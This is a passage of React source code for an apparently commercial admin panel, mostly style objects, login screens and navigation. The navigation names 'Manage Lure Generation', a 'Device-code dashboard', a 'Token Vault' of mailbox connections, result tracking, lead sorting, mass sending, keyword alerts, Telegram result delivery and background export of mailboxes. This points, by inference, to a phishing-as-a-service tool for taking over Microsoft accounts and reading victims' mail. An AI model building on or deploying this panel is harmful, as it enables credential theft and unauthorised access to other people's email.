      maxHeight: "calc(100vh - 245px)",
      borderTop: isDarkMode ? "1px solid #1e293b" : "1px solid #eef2f7",
    },
    outlookMessageCard: {
      width: "100%",
      textAlign: "left",
      padding: "12px 14px",
      border: "none",
      borderBottom: isDarkMode ? "1px solid #1e293b" : "1px solid #eef2f7",
      background: isDarkMode ? "#0f172a" : "#ffffff",
      color: isDarkMode ? "#e5e7eb" : "#172033",
      cursor: "pointer",
      display: "grid",
      gridTemplateColumns: "28px 36px 1fr auto",
      gap: 6,
      alignItems: "start",
      fontFamily: "inherit",
      position: "relative",
      transition: "background 0.15s ease, box-shadow 0.15s ease",
      paddingLeft: 8,
    },
    outlookMessageCardSelected: {
      background: isDarkMode ? "rgba(46,144,250,0.16)" : "#eef6ff",
      boxShadow: "inset 3px 0 0 #2e90fa",
    },
    outlookMessageCardUnread: {
      background: isDarkMode ? "#111827" : "#fbfdff",
    },
    messageAvatar: {
      width: 36,
      height: 36,
      borderRadius: "50%",
      display: "inline-flex",
      alignItems: "center",
      justifyContent: "center",
      fontSize: 14,
      fontWeight: 950,
      flexShrink: 0,
    },
    messageContent: {
      minWidth: 0,
      display: "grid",
      gap: 3,
    },
    messageTopLine: {
      display: "flex",
      alignItems: "center",
      justifyContent: "space-between",
      gap: 8,
      minWidth: 0,
    },
    messageSenderName: {
      fontSize: 13,
      fontWeight: 900,
      color: isDarkMode ? "#f8fafc" : "#172033",
      overflow: "hidden",
      textOverflow: "ellipsis",
      whiteSpace: "nowrap",
    },
    messageSubject: {
      fontWeight: 850,
      fontSize: 13,
      color: isDarkMode ? "#e5e7eb" : "#172033",
      overflow: "hidden",
      textOverflow: "ellipsis",
      whiteSpace: "nowrap",
    },
    messagePreview: {
      fontSize: 12,
      color: isDarkMode ? "#94a3b8" : "#64748b",
      overflow: "hidden",
      textOverflow: "ellipsis",
      whiteSpace: "nowrap",
      lineHeight: 1.35,
    },
    messageFrom: {
      fontSize: 12,
      color: isDarkMode ? "#94a3b8" : "#64748b",
      overflow: "hidden",
      textOverflow: "ellipsis",
      whiteSpace: "nowrap",
    },
    messageDate: {
      fontSize: 11,
      color: isDarkMode ? "#94a3b8" : "#64748b",
      whiteSpace: "nowrap",
      fontWeight: 700,
    },
    unreadDot: {
      width: 9,
      height: 9,
      borderRadius: "50%",
      background: "#2e90fa",
      marginTop: 14,
    },
    readerPaneLarge: {
      background: isDarkMode ? "#0b1220" : "#ffffff",
      padding: 0,
      display: "grid",
      gridTemplateRows: "auto auto 1fr",
      gap: 0,
      height: "100%",
      overflowY: "auto",
      overflowX: "hidden",
      minWidth: 0,
    },
    readerCommandBar: {
      position: "sticky",
      top: 0,
      zIndex: 4,
      display: "flex",
      gap: 8,
      alignItems: "center",
      flexWrap: "wrap",
      padding: "12px 18px",
      background: isDarkMode ? "rgba(11,18,32,0.96)" : "rgba(255,255,255,0.96)",
      borderBottom: isDarkMode ? "1px solid #1e293b" : "1px solid #eef2f7",
      backdropFilter: "blur(10px)",
    },
    outlookCommandButton: {
      border: isDarkMode ? "1px solid #334155" : "1px solid #d9e2f1",
      background: isDarkMode ? "#111827" : "#ffffff",
      color: isDarkMode ? "#e5e7eb" : "#334155",
      borderRadius: 10,
      padding: "8px 12px",
      fontWeight: 850,
      fontSize: 12,
      cursor: "pointer",
      fontFamily: "inherit",
    },
    outlookCommandButtonDanger: {
      border: "1px solid #fecdd3",
      background: isDarkMode ? "rgba(127,29,29,0.16)" : "#fff1f2",
      color: "#be123c",
      borderRadius: 10,
      padding: "8px 12px",
      fontWeight: 850,
      fontSize: 12,
      cursor: "pointer",
      fontFamily: "inherit",
    },
    outlookMoveSelectGroup: {
      display: "inline-flex",
      alignItems: "center",
      gap: 6,
      minWidth: 0,
    },
    outlookMoveSelect: {
      minWidth: 170,
      maxWidth: 260,
      border: isDarkMode ? "1px solid #334155" : "1px solid #d9e2f1",
      background: isDarkMode ? "#111827" : "#ffffff",
      color: isDarkMode ? "#e5e7eb" : "#334155",
      borderRadius: 10,
      padding: "8px 10px",
      fontWeight: 850,
      fontSize: 12,
      outline: "none",
      fontFamily: "inherit",
    },
    readerHeader: {
      padding: "22px 26px 18px",
      borderBottom: isDarkMode ? "1px solid #1e293b" : "1px solid #eef2f7",
      background: isDarkMode ? "#0b1220" : "#ffffff",
    },
    readerSubjectLine: {
      fontSize: 24,
      fontWeight: 900,
      color: isDarkMode ? "#f8fafc" : "#111827",
      lineHeight: 1.25,
      marginBottom: 18,
    },
    readerIdentityRow: {
      display: "grid",
      gridTemplateColumns: "44px minmax(0, 1fr) auto",
      gap: 12,
      alignItems: "center",
    },
    readerAvatarLarge: {
      width: 44,
      height: 44,
      borderRadius: "50%",
      background: "linear-gradient(135deg, #175cd3 0%, #2e90fa 100%)",
      color: "#ffffff",
      display: "inline-flex",
      alignItems: "center",
      justifyContent: "center",
      fontSize: 17,
      fontWeight: 950,
      boxShadow: "0 8px 18px rgba(46,144,250,0.25)",
    },
    readerSenderBlock: {
      display: "grid",
      gap: 3,
      minWidth: 0,
    },
    readerFrom: {
      fontSize: 14,
      color: isDarkMode ? "#f8fafc" : "#172033",
      fontWeight: 900,
      overflow: "hidden",
      textOverflow: "ellipsis",
      whiteSpace: "nowrap",
    },
    readerMetaLine: {
      fontSize: 12,
      color: isDarkMode ? "#94a3b8" : "#64748b",
      fontWeight: 700,
    },
    readerRecipientLine: {
      fontSize: 12,
      color: isDarkMode ? "#94a3b8" : "#64748b",
      overflow: "hidden",
      textOverflow: "ellipsis",
      whiteSpace: "nowrap",
    },
    readerStatePill: {
      borderRadius: 999,
      padding: "7px 10px",
      background: isDarkMode ? "rgba(46,144,250,0.16)" : "#eaf3ff",
      color: isDarkMode ? "#bfdbfe" : "#175cd3",
      fontSize: 11,
      fontWeight: 900,
      whiteSpace: "nowrap",
      border: isDarkMode ? "1px solid rgba(46,144,250,0.28)" : "1px solid #bfdbfe",
    },
    readerBodyFrame: {
      padding: "24px 28px",
      background: isDarkMode ? "#0b1220" : "#ffffff",
      maxWidth: "100%",
      minWidth: 0,
      overflowX: "hidden",
      boxSizing: "border-box",
    },
    readerBodyLarge: {
      fontSize: 14.5,
      color: "#172033",
      background: "#ffffff",
      border: isDarkMode ? "1px solid #334155" : "1px solid #eef2f7",
      borderRadius: 16,
      padding: "22px 24px",
      lineHeight: 1.85,
      width: "100%",
      maxWidth: "100%",
      minWidth: 0,
      overflowX: "hidden",
      overflowWrap: "anywhere",
      wordBreak: "break-word",
      boxSizing: "border-box",
      boxShadow: isDarkMode ? "0 18px 50px rgba(0,0,0,0.28)" : "none",
      userSelect: "text",
    },
    readerEmpty: {
      minHeight: "calc(100vh - 118px)",
      display: "flex",
      flexDirection: "column",
      alignItems: "center",
      justifyContent: "center",
      padding: "60px 24px",
      gap: 10,
      background: isDarkMode ? "#0b1220" : "#ffffff",
    },
    readerEmptyIcon: {
      width: 58,
      height: 58,
      borderRadius: 20,
      background: isDarkMode ? "#111827" : "#f1f5f9",
      border: isDarkMode ? "1px solid #334155" : "1px solid #e2e8f0",
      display: "flex",
      alignItems: "center",
      justifyContent: "center",
      fontSize: 24,
      marginBottom: 8,
    },
    readerEmptyTitle: {
      fontSize: 19,
      fontWeight: 900,
      color: isDarkMode ? "#f8fafc" : "#172033",
    },
    readerEmptyText: {
      fontSize: 13,
      color: isDarkMode ? "#94a3b8" : "#64748b",
      textAlign: "center",
      lineHeight: 1.7,
      maxWidth: 360,
    },
    outlookEmptyPanel: {
      padding: "34px 18px",
      textAlign: "center",
      display: "grid",
      gap: 6,
      justifyItems: "center",
      color: isDarkMode ? "#94a3b8" : "#64748b",
    },
    outlookEmptyIcon: {
      width: 42,
      height: 42,
      borderRadius: 16,
      display: "flex",
      alignItems: "center",
      justifyContent: "center",
      background: isDarkMode ? "#111827" : "#f1f5f9",
      fontSize: 20,
      marginBottom: 4,
    },
    outlookEmptyTitle: {
      fontSize: 14,
      fontWeight: 900,
      color: isDarkMode ? "#e5e7eb" : "#334155",
    },
    outlookEmptyText: {
      fontSize: 12,
      lineHeight: 1.55,
      maxWidth: 220,
    },
    outlookAttachmentPanel: {
      margin: "0 28px 22px",
      padding: "14px 16px",
      borderRadius: 16,
      border: isDarkMode ? "1px solid #1e293b" : "1px solid #e2e8f0",
      background: isDarkMode ? "#111827" : "#f8fafc",
      display: "grid",
      gap: 12,
    },
    outlookAttachmentGrid: {
      display: "grid",
      gap: 10,
    },
    outlookAttachmentCard: {
      display: "flex",
      alignItems: "center",
      gap: 10,
      padding: "10px 12px",
      borderRadius: 13,
      border: isDarkMode ? "1px solid #334155" : "1px solid #d9e2f1",
      background: isDarkMode ? "#0b1220" : "#ffffff",
    },
    attachmentIcon: {
      width: 34,
      height: 34,
      borderRadius: 12,
      display: "flex",
      alignItems: "center",
      justifyContent: "center",
      background: isDarkMode ? "#1e293b" : "#eef6ff",
      flexShrink: 0,
    },
    attachmentName: {
      fontSize: 13,
      fontWeight: 900,
      color: isDarkMode ? "#f8fafc" : "#172033",
      overflow: "hidden",
      textOverflow: "ellipsis",
      whiteSpace: "nowrap",
    },
    attachmentMeta: {
      fontSize: 11,
      color: isDarkMode ? "#94a3b8" : "#64748b",
      marginTop: 2,
    },
    outlookMovePanel: {
      margin: "0 28px 28px",
      padding: "14px 16px",
      borderRadius: 16,
      border: isDarkMode ? "1px solid #1e293b" : "1px solid #e2e8f0",
      background: isDarkMode ? "#111827" : "#f8fafc",
    },
    outlookFolderChip: {
      border: isDarkMode ? "1px solid #334155" : "1px solid #d9e2f1",
      background: isDarkMode ? "#0b1220" : "#ffffff",
      color: isDarkMode ? "#e5e7eb" : "#334155",
      borderRadius: 999,
      padding: "8px 12px",
      fontWeight: 850,
      fontSize: 12,
      cursor: "pointer",
      fontFamily: "inherit",
    },
    editorCard: {
      padding: "14px 16px",
      borderRadius: 16,
      border: "1px solid #eaecf0",
      background: "#fafbff",
      display: "grid",
      gap: 10,
    },
    folderItem: {
      width: "100%",
      textAlign: "left",
      padding: "9px 12px",
      borderRadius: 10,
      border: "1px solid #e6e9f0",
      background: "#ffffff",
      cursor: "pointer",
      fontWeight: 700,
      fontSize: 12,
      fontFamily: "inherit",
      transition: "all 0.15s ease",
    },
    ruleCard: {
      padding: "12px 14px",
      borderRadius: 14,
      border: "1px solid #eaecf0",
      background: "#fafbff",
      display: "grid",
      gap: 6,
    },
    ruleCardTop: {
      display: "flex",
      gap: 8,
      alignItems: "center",
    },
    rulePill: {
      fontSize: 11,
      fontWeight: 800,
      color: "#667085",
      background: "#f2f4f7",
      borderRadius: 8,
      padding: "3px 8px",
    },
    ruleLine: {
      fontSize: 12,
      color: "#344054",
      lineHeight: 1.6,
    },
  };

  const adminOnlyNavKeys = new Set([
    "customers",
  ]);

  const navSections = [
    {
      title: "Overview",
      items: [
        { key: "dashboard", label: "Dashboard", icon: "⬛" },
        { key: "visits", label: "Activity Tracking", icon: "🔗" },
        { key: "results", label: "Results", icon: "📊" },
      ],
    },
    {
      title: "Access",
      items: [
        { key: "connections", label: "Manage Users/Mailboxes", icon: "🔌" },
        { key: "customers", label: "Customer Plans", icon: "💼" },
        { key: "connect", label: "Manage Lure Generation", icon: "🔑" },
        { key: "tokenvault", label: "Connections List", icon: "🗄" },
        { key: "vault", label: "Vault", icon: "🔒" },
      ],
    },
    {
      title: "Mailbox",
      items: [
        { key: "mail", label: "Mail Viewer", icon: "📬" },
        { key: "sender", label: "Sender", icon: "✉️" },
        { key: "leadcleaner", label: "Leads Verifier", icon: "🧹" },
        { key: "providersorter", label: "Leads Sorter", icon: "🗂️" },
        { key: "automation", label: "Set Rules", icon: "⚙️" },
        { key: "keywords", label: "Keyword Alert Settings", icon: "🎯" },
        { key: "background-export", label: "Background Export", icon: "📥" },
        { key: "background-jobs", label: "Background Jobs", icon: "⏳" },
      ],
    },
    {
      title: "Settings",
      items: [
        { key: "telegram", label: "Telegram Bot Settings", icon: "🤖" },
        { key: "settings", label: "Settings & Support", icon: "🛠️" },
      ],
    },
  ];

  const pageTitles = {
    dashboard: { eyebrow: "Overview", title: "Dashboard" },
    visits: { eyebrow: "Tracking", title: "Activity Logs" },
    results: { eyebrow: "Tracking", title: "Results" },
    connections: { eyebrow: "Access", title: "Connections" },
    customers: { eyebrow: "Access", title: "Customer Plans" },
    connect: { eyebrow: "Access", title: "Manage Lure Generation" },
    tokenvault: { eyebrow: "Security", title: "Mailbox Connections" },
    mail: { eyebrow: "Mailbox", title: "Mail Reader" },
    sender: { eyebrow: "Mailbox", title: "Message Center" },
    leadcleaner: { eyebrow: "Mailbox", title: "Lead Cleaner" },
    providersorter: { eyebrow: "Mailbox", title: "Leads Sorter" },
    automation: { eyebrow: "Mailbox", title: "Automation Rules" },
    keywords: { eyebrow: "Mailbox", title: "Keyword Listener Settings" },
    telegram: { eyebrow: "Settings", title: "Telegram Result Settings" },
    settings: { eyebrow: "Settings", title: "Settings" },
    vault: { eyebrow: "Security", title: "Token Vault" },
    "background-export": { eyebrow: "Mailbox", title: "Background Export" },
    "background-jobs": { eyebrow: "Mailbox", title: "Background Jobs" },
  };

  const currentPage = pageTitles[activeNav] || {
    eyebrow: "",
    title: activeNav,
  };
    if (loading) {
    return (
      <div style={styles.loadingScreen}>
        <style>{`
          @keyframes spin { to { transform: rotate(360deg); } }
          @keyframes slideIn { from { opacity: 0; transform: translateY(10px); } to { opacity: 1; transform: translateY(0); } }
        `}</style>
        <div style={styles.loadingCard}>
          {renderProductLogo(42)}
          <div style={styles.loadingSpinner} />
          <img
                src={SIDEBAR_LOGO_URL}
                alt={BRAND_NAME}
                style={{
                  width: 34,
                  height: 34,
                  borderRadius: 10,
                  objectFit: "cover",
                  background: "#ffffff",
                }}
              />
          <div style={styles.loadingTitle}>{BRAND_NAME}</div>
          <div style={styles.loadingText}>Starting Service...</div>
        </div>
      </div>
    );
  }

  if (!isAuthenticated) {
    const params = new URLSearchParams(window.location.search);
    const isSharedMailboxLogin = params.get("shared_login") === "1" || !!standaloneMailboxId;

    if (isSharedMailboxLogin) {
      return (
        <div style={styles.loginShell}>
          <div style={styles.loginCard}>
            <div style={styles.loginBrand}>Temporary Mailbox Login</div>
            <div style={styles.loginSubtitle}>
              Enter login details.
            </div>

            <label style={styles.label}>Username</label>
            <input
              style={{
                ...styles.input,
                background: isDarkMode ? "#ffffff" : "#ffffff",
                color: "#111827",
                border: "1px solid #d0d5dd",
              }}
              value={tempViewerUsername}
              onChange={(e) => setTempViewerUsername(e.target.value)}
              placeholder="Temporary username"
            />

            <label style={styles.label}>Password</label>
            <input
              style={{
                ...styles.input,
                background: isDarkMode ? "#ffffff" : "#ffffff",
                color: "#111827",
                border: "1px solid #d0d5dd",
              }}
              type="password"
              value={tempViewerPassword}
              onChange={(e) => setTempViewerPassword(e.target.value)}
              placeholder="Temporary password"
              onKeyDown={(e) => {
                if (e.key === "Enter") loginTemporaryMailboxViewer();
              }}
            />

            <button
              style={styles.primaryButton}
              onClick={loginTemporaryMailboxViewer}
              disabled={tempViewerLoginLoading}
            >
              {tempViewerLoginLoading ? "Signing in..." : "Open Mailbox"}
            </button>
          </div>
          <ToastContainer toasts={toasts} removeToast={removeToast} />
        </div>
      );
    }

    return (
      <div style={styles.loginPage}>
        <style>{`
          @keyframes spin { to { transform: rotate(360deg); } }
          @keyframes slideIn { from { opacity: 0; transform: translateY(10px); } to { opacity: 1; transform: translateY(0); } }
          body { margin: 0; background: #f6f8fb; }
        `}</style>
        <div style={styles.loginShell}>
          <div style={styles.loginHero}>
            <div style={styles.loginHeroBadge}>Management Panel</div>
            <h1 style={styles.loginHeroTitle}>{BRAND_NAME}</h1>
            <p style={styles.loginHeroText}>
              Secure premium featured management for your workspace.
            </p>
            <div style={styles.loginHeroStatus}>
              <span style={styles.loginStatusDot} />
              Production access portal
            </div>
          </div>

          <div style={styles.loginCard}>
            <div style={styles.loginBrandRow}>
              <img
                src={LOGIN_LOGO_URL}
                alt={BRAND_NAME}
                style={{
                  width: 42,
                  height: 42,
                  borderRadius: 12,
                  objectFit: "cover",
                  background: "#ffffff",
                }}
              />
              <div>
                <div style={styles.loginBrandName}>Admin sign in</div>
                <div style={styles.loginBrandSub}>Device-code dashboard</div>
              </div>
            </div>

            <div style={styles.loginDivider} />

            <div style={styles.loginFieldGroup}>
              <label style={styles.loginLabel}>Username</label>
              <input
                style={styles.loginInput}
                placeholder="Enter admin username"
                value={username}
                onChange={(e) => setUsername(e.target.value)}
                onKeyDown={(e) => e.key === "Enter" && login()}
                autoFocus
              />
            </div>

            <div style={styles.loginFieldGroup}>
              <label style={styles.loginLabel}>Password</label>
              <input
                style={styles.loginInput}
                type="password"
                placeholder="Enter password"
                value={password}
                onChange={(e) => setPassword(e.target.value)}
                onKeyDown={(e) => e.key === "Enter" && login()}
              />
            </div>

            {loginRequires2fa && (
              <div style={styles.loginFieldGroup}>
                <label style={styles.loginLabel}>Google Authenticator code</label>
                <input
                  style={styles.loginInput}
                  inputMode="numeric"
                  autoComplete="one-time-code"
                  placeholder="Enter 6-digit code"
                  value={loginOtpCode}
                  onChange={(e) => setLoginOtpCode(e.target.value.replace(/\D/g, "").slice(0, 6))}
                  onKeyDown={(e) => e.key === "Enter" && login()}
                />
              </div>
            )}

            <button
              style={{
                ...styles.loginButton,
                opacity: loginLoading ? 0.72 : 1,
                cursor: loginLoading ? "not-allowed" : "pointer",
              }}
              onClick={login}
              disabled={loginLoading}
            >
              {loginLoading ? "Signing in..." : "Sign in securely"}
            </button>

            <div style={styles.loginFooterNote}>
              Protected admin area. Your dashboard theme preference starts after login.
            </div>
          </div>
        </div>
        <ToastContainer toasts={toasts} removeToast={removeToast} />
      </div>
    );
  }

  if (isStandaloneMailViewer) {
    return (
      <div
        style={{
          minHeight: "100vh",
          width: "100vw",
          overflow: "hidden",
          background: isDarkMode ? "#08111f" : "#f4f6fb",
          color: isDarkMode ? "#f8fafc" : "#172033",
          fontFamily:
            '-apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Arial, sans-serif',
        }}
        data-theme={themeMode}
      >
        <style>{`
          @keyframes spin { to { transform: rotate(360deg); } }
          @keyframes slideIn { from { opacity: 0; transform: translateY(10px); } to { opacity: 1; transform: translateY(0); } }
          * { box-sizing: border-box; }
          body { margin: 0; background: ${isDarkMode ? "#08111f" : "#f4f6fb"}; overflow: hidden; }
          [data-theme="dark"] table th { background: #111827 !important; color: #cbd5e1 !important; border-color: #334155 !important; }
          [data-theme="dark"] table td { color: #e5e7eb !important; border-color: #263244 !important; }
          [data-theme="dark"] input, [data-theme="dark"] select, [data-theme="dark"] textarea { background: #0b1220 !important; color: #e5e7eb !important; border-color: #334155 !important; }
          [data-theme="dark"] input::placeholder, [data-theme="dark"] textarea::placeholder { color: #94a3b8 !important; }
          ::-webkit-scrollbar { width: 6px; height: 6px; }
          ::-webkit-scrollbar-track { background: transparent; }
          ::-webkit-scrollbar-thumb { background: #d0d5dd; border-radius: 99px; }
          ::-webkit-scrollbar-thumb:hover { background: #98a2b3; }
          button:hover { opacity: 0.88; }
          input:focus, select:focus, textarea:focus { border-color: #2e90fa !important; box-shadow: 0 0 0 3px rgba(46,144,250,0.12); }
        `}</style>

        <div
          style={{
            display: "flex",
            alignItems: "center",
            justifyContent: "space-between",
            gap: 12,
            height: 54,
            padding: "10px 16px",
            borderBottom: isDarkMode ? "1px solid #1e293b" : "1px solid #d9e2f1",
            background: isDarkMode ? "#0b1220" : "#ffffff",
          }}
        >
          <div style={{ minWidth: 0 }}>
            <div style={{ fontSize: 13, fontWeight: 900 }}>Mail Viewer</div>
            <div
              style={{
                fontSize: 12,
                color: isDarkMode ? "#94a3b8" : "#64748b",
                overflow: "hidden",
                textOverflow: "ellipsis",
                whiteSpace: "nowrap",
                maxWidth: "60vw",
              }}
            >
              {selectedUserId || standaloneMailboxId || "Mailbox"}
            </div>
          </div>

          <div style={{ display: "flex", gap: 8, alignItems: "center" }}>
            <button
              style={styles.secondaryButton}
              onClick={async () => {
                const userToRefresh = selectedUserId || standaloneMailboxId;
                if (userToRefresh) {
                  await fetchMicrosoftStatus(userToRefresh);
                  await loadFolders(userToRefresh);
                  await loadEmails(currentFolderId, userToRefresh);
                }
              }}
            >
              ↺ Refresh
            </button>
            <button
              style={styles.secondaryButton}
              onClick={() => window.close()}
              title="Close this mail viewer tab"
            >
              Close tab
            </button>
          </div>
        </div>

        <div style={{ padding: 12, height: "calc(100vh - 54px)", overflow: "hidden" }}>
          <div
            style={{
              height: "100%",
              overflow: "hidden",
            }}
          >
            {renderMail()}
          </div>
        </div>

        <Modal
          open={confirmModal.open}
          onClose={() =>
            setConfirmModal((prev) => ({ ...prev, open: false }))
          }
          title={confirmModal.title}
        >
          <div
            style={{
              fontSize: 14,
              color: "#344054",
              lineHeight: 1.7,
            }}
          >
            {confirmModal.message}
          </div>
          <div style={{ display: "flex", gap: 10, justifyContent: "flex-end" }}>
            <button
              style={styles.secondaryButton}
              onClick={() =>
                setConfirmModal((prev) => ({ ...prev, open: false }))
              }
            >
              Cancel
            </button>
            <button
              style={{
                ...styles.primaryButton,
                background:
                  "linear-gradient(135deg, #dc2626 0%, #ef4444 100%)",
                boxShadow: "0 4px 14px rgba(220,38,38,0.20)",
              }}
              onClick={() => {
                if (confirmModal.onConfirm) confirmModal.onConfirm();
                setConfirmModal((prev) => ({ ...prev, open: false }));
              }}
            >
              Confirm
            </button>
          </div>
        </Modal>

        <ToastContainer toasts={toasts} removeToast={removeToast} />
      </div>
    );
  }

  return (
    <div style={styles.appFrame} data-theme={themeMode}>
      <style>{`
        @keyframes spin { to { transform: rotate(360deg); } }
        @keyframes slideIn { from { opacity: 0; transform: translateY(10px); } to { opacity: 1; transform: translateY(0); } }
        * { box-sizing: border-box; }
        body { margin: 0; background: ${isDarkMode ? "#08111f" : "#f4f6fb"}; }
        [data-theme="dark"] table th { background: #111827 !important; color: #cbd5e1 !important; border-color: #334155 !important; }
        [data-theme="dark"] table td { color: #e5e7eb !important; border-color: #263244 !important; }
        [data-theme="dark"] input, [data-theme="dark"] select, [data-theme="dark"] textarea { background: #0b1220 !important; color: #e5e7eb !important; border-color: #334155 !important; }
        [data-theme="dark"] input::placeholder, [data-theme="dark"] textarea::placeholder { color: #94a3b8 !important; }
        ::-webkit-scrollbar { width: 6px; height: 6px; }
        ::-webkit-scrollbar-track { background: transparent; }
        ::-webkit-scrollbar-thumb { background: #d0d5dd; border-radius: 99px; }
        ::-webkit-scrollbar-thumb:hover { background: #98a2b3; }
        button:hover { opacity: 0.88; }
        input:focus, select:focus, textarea:focus { border-color: #2e90fa !important; box-shadow: 0 0 0 3px rgba(46,144,250,0.12); }
      `}</style>

      <div
        style={{
          ...styles.sidebar,
          width: sidebarCollapsed ? 64 : 220,
        }}
      >
        <div>
          <div style={styles.sidebarBrandWrap}>
            <img
              src={SIDEBAR_LOGO_URL}
              alt={BRAND_NAME}
              style={{
                width: 38,
                height: 38,
                borderRadius: 10,
                objectFit: "cover",
                background: "#ffffff",
              }}
            />
            {!sidebarCollapsed && (
              <div>
                <div style={styles.sidebarBrand}>{BRAND_NAME}</div>
                <div style={styles.sidebarBrandSub}>Management Panel</div>
              </div>
            )}
          </div>

          <button
            style={styles.collapseButton}
            onClick={() => setSidebarCollapsed((v) => !v)}
          >
            {sidebarCollapsed ? "→" : "← Hide"}
          </button>

          {navSections.map((section) => (
            <div key={section.title} style={{ marginBottom: 16 }}>
              {!sidebarCollapsed && (
                <div style={styles.sidebarSectionTitle}>
                  {section.title}
                </div>
              )}
              {section.items
                .filter((item) => isAdmin || !adminOnlyNavKeys.has(item.key))
                .map((item) =>
                  renderSidebarItem(item.key, item.label, item.icon)
                )}
            </div>
          ))}
        </div>

        <div style={styles.sidebarFooter}>
          {!sidebarCollapsed && (
            <>
              <div style={styles.sidebarFooterCard}>
                <div style={styles.sidebarFooterTitle}>
                  {selectedUserId ? "Active user" : "No user selected"}
                </div>
                <div style={styles.sidebarFooterText}>
                  {selectedUserId || "Select a user in Connections"}
                </div>
              </div>
              <div style={styles.sidebarFooterCard}>
                <div style={styles.sidebarFooterTitle}>Server</div>
                <div style={{ marginTop: 4 }}>
                  <StatusDot
                    active={serverAlive}
                    label={serverAlive ? "Online" : "Offline"}
                  />
                </div>
              </div>
            </>
          )}
          <button style={styles.sidebarLogoutButton} onClick={logout}>
            {sidebarCollapsed ? "↩" : "↩ Sign out"}
          </button>
        </div>
      </div>

      <div style={styles.mainArea}>
        <div style={styles.topBar}>
          <div>
            <div style={styles.pageEyebrow}>{currentPage.eyebrow}</div>
            <div style={styles.pageTitle}>{currentPage.title}</div>
          </div>
          <div style={styles.topActions}>
            {renderStatusPills()}
            {READ_ONLY_MODE && renderBadge("Read-Only Mode", "orange")}
            <select
              style={{ ...styles.select, maxWidth: 220 }}
              value={selectedUserId}
              onChange={(e) => setSelectedUserId(e.target.value)}
            >
              <option value="">Select user</option>
              {availableUsers.map((u) => (
                <option key={u} value={u}>
                  {u}
                </option>
              ))}
            </select>
            <button
              style={styles.secondaryButton}
              onClick={async () => {
                await fetchUsers();
                if (isAdmin) await fetchCustomerAccounts();
                await fetchDashboardSummary();
                await fetchTenantConsents();
                await fetchEnterpriseTenants();
                if (selectedUserId) {
                  await fetchMicrosoftStatus(selectedUserId);
                  await fetchEnterpriseStatus(selectedUserId);
                }
                addToast("Workspace refreshed", "success");
              }}
            >
              ↺ Refresh
            </button>
          </div>
        </div>

        <div style={styles.pageContent}>
          {activeNav === "dashboard" && <>{renderUpgradeBanner()}{renderDashboard()}</>}
          {activeNav === "visits" && renderVisits()}
          {activeNav === "results" && renderResults()}
          {activeNav === "connections" && renderConnections()}
          {activeNav === "customers" && isAdmin && renderCustomerAccounts()}
          {activeNav === "connect" && renderManageUrlGeneration()}
          {activeNav === "tokenvault" && renderTokenVault()}
          {activeNav === "mail" && renderMail()}
          {activeNav === "sender" && renderSender()}
          {activeNav === "leadcleaner" && renderLeadCleaner()}
          {activeNav === "providersorter" && renderProviderSorter()}
          {activeNav === "automation" && renderAutomation()}
          {activeNav === "keywords" && renderKeywordSettings()}
          {activeNav === "telegram" && renderTelegramSettings()}
          {activeNav === "settings" && renderSettings()}
          {activeNav === "vault" && <Vault />}
          {activeNav === "background-export" && renderBackgroundExport()}
          {activeNav === "background-jobs" && renderBackgroundJobs()}
        </div>
      </div>

      <Modal
        open={conversationsModal.open}
        onClose={() => setConversationsModal({ open: false, email: "", threads: [] })}
        title={`Conversations with ${conversationsModal.email}`}
      >
        {conversationsModal.threads.length === 0 ? (
          <div style={styles.emptyState}>No conversations found.</div>
        ) : (
          <div style={{ display: "grid", gap: 12, maxHeight: "60vh", overflow: "auto" }}>
            {conversationsModal.threads.map((thread, idx) => (
              <div key={idx} style={{ ...styles.linkPanel, padding: 12 }}>
                <div style={{ fontWeight: 900 }}>{thread.subject}</div>
                <div style={styles.inlineNote}>Messages: {thread.message_count}</div>
                <div style={styles.inlineNote}>Latest: {thread.latest_date ? new Date(thread.latest_date).toLocaleString() : "—"}</div>
                <button
                  style={styles.secondaryButton}
                  onClick={() => {
                    setConversationsModal({ open: false, email: "", threads: [] });
                  }}
                >
                  View thread
                </button>
              </div>
            ))}
          </div>
        )}
      </Modal>

      <Modal
        open={confirmModal.open}
        onClose={() =>
          setConfirmModal((prev) => ({ ...prev, open: false }))
        }
        title={confirmModal.title}
      >
        <div
          style={{
            fontSize: 14,
            color: "#344054",
            lineHeight: 1.7,
          }}
        >
          {confirmModal.message}
        </div>
        <div style={{ display: "flex", gap: 10, justifyContent: "flex-end" }}>
          <button
            style={styles.secondaryButton}
            onClick={() =>
              setConfirmModal((prev) => ({ ...prev, open: false }))
            }
          >
            Cancel
          </button>
          <button
            style={{
              ...styles.primaryButton,
              background:
                "linear-gradient(135deg, #dc2626 0%, #ef4444 100%)",
              boxShadow: "0 4px 14px rgba(220,38,38,0.20)",
            }}
            onClick={() => {
              if (confirmModal.onConfirm) confirmModal.onConfirm();
              setConfirmModal((prev) => ({ ...prev, open: false }));
            }}
          >
            Confirm
          </button>
        </div>
      </Modal>

      <ToastContainer toasts={toasts} removeToast={removeToast} />
    </div>
  );
}

export default App;